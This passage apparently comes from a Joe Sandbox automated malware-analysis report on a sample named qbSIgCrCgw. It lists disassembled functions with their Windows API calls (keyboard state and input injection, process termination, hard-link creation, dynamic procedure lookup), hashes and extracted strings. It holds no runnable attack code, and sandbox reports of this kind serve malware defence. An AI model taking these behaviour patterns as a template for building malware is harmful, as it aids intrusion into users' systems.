                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 2942034483-0
                                                                                • Opcode ID: ff935bc532ce764af4a9b1e89f2628bcf4892d2c37aca2cea8bf1b2ed3f1ac65
                                                                                • Instruction ID: 0026194ea31d3a60da3976e87676b6a8665b0a14dce3a416d5c7913df3c1f97c
                                                                                • Opcode Fuzzy Hash: ff935bc532ce764af4a9b1e89f2628bcf4892d2c37aca2cea8bf1b2ed3f1ac65
                                                                                • Instruction Fuzzy Hash: 7DF0903350D7121AEA2777347C0BA4A27849F01730B210AABF8A0DE3D2FF2188414565
                                                                                Function 003B27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B281D
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 003B2825
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B2830
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B283B
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 003B2843
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B284B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: 7a0184d20929b06917421e3bd00fe2a93da971af9b6fe40f8072a2ca5a35648b
                                                                                • Instruction ID: 029f2fd0c09a79763776559eb390a08328474051015294dacad9f93aeabd1057
                                                                                • Opcode Fuzzy Hash: 7a0184d20929b06917421e3bd00fe2a93da971af9b6fe40f8072a2ca5a35648b
                                                                                • Instruction Fuzzy Hash: D50167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                Function 003F9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1423608774-0
                                                                                • Opcode ID: 3284bb93cc385b0c4b1f7d21d56a4d6afbe50f33fab337005f813bad1ff55d49
                                                                                • Instruction ID: b88fdea7e2576009f15d4b0f6509248e4d6eb20e7d747e328df977c55a1518bf
                                                                                • Opcode Fuzzy Hash: 3284bb93cc385b0c4b1f7d21d56a4d6afbe50f33fab337005f813bad1ff55d49
                                                                                • Instruction Fuzzy Hash: F6018132902216ABDB262B64FC48FFB776AFF88701B15147BF603960A0DB649810DB54
                                                                                Function 003F7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003F7C07
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003F7C1D
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 003F7C2C
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C3B
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C45
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: 97996ec9501e5d19bd889849a873686204e4f60f844c4b24213ab310e957ee97
                                                                                • Instruction ID: 5dbf83bc4a6c476d4fc36166befc980bd9f01ca3545ac053410325407d37f741
                                                                                • Opcode Fuzzy Hash: 97996ec9501e5d19bd889849a873686204e4f60f844c4b24213ab310e957ee97
                                                                                • Instruction Fuzzy Hash: 97F05E72A41158BBE7215B62AC0EEEF7F7CEFC6B11F001028FA12D1091D7A05E41D6B9
                                                                                Function 003F9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 003F9A33
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A44
                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A51
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A5E
                                                                                  • Part of subcall function 003F93D1: CloseHandle.KERNEL32(?,?,003F9A6B,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F93DB
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F9A71
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A78
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 76eacc0ddecffb042341ef1a76401755ee86adf8443e028fea403e98bf894b81
                                                                                • Instruction ID: 9ab710e51889656f32f627deb1185f1bfae0971419bb52fd0b6f66551bdac80c
                                                                                • Opcode Fuzzy Hash: 76eacc0ddecffb042341ef1a76401755ee86adf8443e028fea403e98bf894b81
                                                                                • Instruction Fuzzy Hash: FAF05E32941211ABD7121BA4FC89EEB773AFF84301F151476F603950A0DBB59811DB55
                                                                                Function 003B1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CF4EA: std::exception::exception.LIBCMT ref: 003CF51E
                                                                                  • Part of subcall function 003CF4EA: __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                • __swprintf.LIBCMT ref: 003B1EA6
                                                                                Strings
                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003B1D49
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                • API String ID: 2125237772-557222456
                                                                                • Opcode ID: 9b846c60daa38b53cc4d8cf59c272a683d584b0aedfab420d61d0b9bdbf12a6d
                                                                                • Instruction ID: 8cf2667bc6177e5a3dbbdf1e819fb4774c7a4903b1091067e51e9c1fdcc47004
                                                                                • Opcode Fuzzy Hash: 9b846c60daa38b53cc4d8cf59c272a683d584b0aedfab420d61d0b9bdbf12a6d
                                                                                • Instruction Fuzzy Hash: A691A171204211AFC726EF24D896CAFB7B4BF85704F40491EFA459B6A1DB74EE04CB92
                                                                                Function 0040AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0040B006
                                                                                • CharUpperBuffW.USER32(?,?), ref: 0040B115
                                                                                • VariantClear.OLEAUT32(?), ref: 0040B298
                                                                                  • Part of subcall function 003F9DC5: VariantInit.OLEAUT32(00000000), ref: 003F9E05
                                                                                  • Part of subcall function 003F9DC5: VariantCopy.OLEAUT32(?,?), ref: 003F9E0E
                                                                                  • Part of subcall function 003F9DC5: VariantClear.OLEAUT32(?), ref: 003F9E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: 8b6c3462775b857ef9f377d1a8f57e7dc75cc71439eb5a4f215f719117502583
                                                                                • Instruction ID: becdd157f0f420d3d3dadfc24070a8015f62100597099e5928c5af20203fde52
                                                                                • Opcode Fuzzy Hash: 8b6c3462775b857ef9f377d1a8f57e7dc75cc71439eb5a4f215f719117502583
                                                                                • Instruction Fuzzy Hash: 82918C706083019FCB10DF24C48599BB7F4EF89704F04486EF99A9B392DB35E905CB96
                                                                                Function 003F5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CC6F4: _wcscpy.LIBCMT ref: 003CC717
                                                                                • _memset.LIBCMT ref: 003F5438
                                                                                • GetMenuItemInfoW.USER32(?), ref: 003F5467
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003F5513
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003F553D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                • String ID: 0
                                                                                • API String ID: 4152858687-4108050209
                                                                                • Opcode ID: f2f9edd63c3971d559117e0d611ca9c2185762f22b4210b559717b8d75df9516
                                                                                • Instruction ID: e5113c794a0413b2fad108da6d0e0086837ba0b8615d77543e118bb978961c48
                                                                                • Opcode Fuzzy Hash: f2f9edd63c3971d559117e0d611ca9c2185762f22b4210b559717b8d75df9516
                                                                                • Instruction Fuzzy Hash: 675123716047099BD7169F2CC841BBBBBE8AF86314F05062EFB9AD71A1DB60CD44CB52
                                                                                Function 003F0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003F027B
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003F02B1
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003F02C2
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003F0344
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                • Opcode ID: 419c3a6481322aaf3db1b1393339174f7e973018d047c396826e2b1e94915aff
                                                                                • Instruction ID: edab09a5d986faea44148b6a6b3e0ec8156b985b7f92d35013c55fe0bb5727ae
                                                                                • Opcode Fuzzy Hash: 419c3a6481322aaf3db1b1393339174f7e973018d047c396826e2b1e94915aff
                                                                                • Instruction Fuzzy Hash: F8416875600208DFDB0ACF58C984BAA7BB9EF44310F15806AEE09DF206D7B5DD44CBA0
                                                                                Function 003F5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F5075
                                                                                • GetMenuItemInfoW.USER32 ref: 003F5091
                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003F50D7
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00471708,00000000), ref: 003F5120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1173514356-4108050209
                                                                                • Opcode ID: 18e2c5e1e3978fee682174c77a33c89f99df9f2847e7de9628a411c802938ef4
                                                                                • Instruction ID: 35d925947ed21d9df82212e28f8ca699ad6fbc7a929d3640979b2d9e0991bf31
                                                                                • Opcode Fuzzy Hash: 18e2c5e1e3978fee682174c77a33c89f99df9f2847e7de9628a411c802938ef4
                                                                                • Instruction Fuzzy Hash: DA41C131204705AFDB22DF28DC85F6AB7E8AF85314F04461EFB659B291D730E804CB62
                                                                                Function 003F390C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003F3966
                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 003F3982
                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003F39EF
                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 003F3A4D
                                                                                Strings
                                                                                • 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f, xrefs: 003F399D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f
                                                                                • API String ID: 432972143-2477213679
                                                                                • Opcode ID: 71782a11de0fe3449a71353b94567b2744041bca84670ad15ec7847c5fc0caed
                                                                                • Instruction ID: 3c521532a9fa2872300443ae4435d0a49deee54704eeda94d0d622677ea01aad
                                                                                • Opcode Fuzzy Hash: 71782a11de0fe3449a71353b94567b2744041bca84670ad15ec7847c5fc0caed
                                                                                • Instruction Fuzzy Hash: C3411670E0424CAEEF228B65C80ABFFBBB9AB55310F14015AF6C1962D1C7F48E85D765
                                                                                Function 003FE698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003FE742
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 003FE768
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003FE78D
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003FE7B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID: p1Wu`KXu
                                                                                • API String ID: 3321077145-4063981602
                                                                                • Opcode ID: 5bebdf836cd221de7ebd36c2b295120f6facffe3c6a85dc63d935b63910d3f53
                                                                                • Instruction ID: 9368ed225393586aa7bc4e015d184612678b5ef7dceaea0eb67e04f4ee8031e1
                                                                                • Opcode Fuzzy Hash: 5bebdf836cd221de7ebd36c2b295120f6facffe3c6a85dc63d935b63910d3f53
                                                                                • Instruction Fuzzy Hash: 9D413739600614DFCB12EF15C544A5DBBE5BF59714B098499EA0AAF7B2CB30FC00CB91
                                                                                Function 003F3A61 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 003F3AB8
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 003F3AD4
                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 003F3B34
                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 003F3B92
                                                                                Strings
                                                                                • 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f, xrefs: 003F3AF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f
                                                                                • API String ID: 432972143-2477213679
                                                                                • Opcode ID: c359f8aa12cc721b3ca5a61a6d88e3517d39c0b7d75899f7c13ab0dc4f8dcd16
                                                                                • Instruction ID: fa2774dcaf2ed70db095942eb9a6c47b4c0f39eb426a551c459af33d8ff3c17f
                                                                                • Opcode Fuzzy Hash: c359f8aa12cc721b3ca5a61a6d88e3517d39c0b7d75899f7c13ab0dc4f8dcd16
                                                                                • Instruction Fuzzy Hash: CC315630A0425CAEEF338B64C829BFEBBA99F55310F05016AF681972D1C7748F45C766
                                                                                Function 00410567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00410587
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: 166a2cf3bb43e51e7b55e265e7bd1106ebc64ff10906bae649bf040b62eee1f2
                                                                                • Instruction ID: 6a90f819ecf7924e5fd17ded98394477eeee644dc4d46d81a98e11770314ae70
                                                                                • Opcode Fuzzy Hash: 166a2cf3bb43e51e7b55e265e7bd1106ebc64ff10906bae649bf040b62eee1f2
                                                                                • Instruction Fuzzy Hash: 4831C530500216AFCF11EF54CD419EEB3B4FF55314B10862AE426AB6D1DBB9E955CB44
                                                                                Function 003EB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003EB88E
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003EB8A1
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 003EB8D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
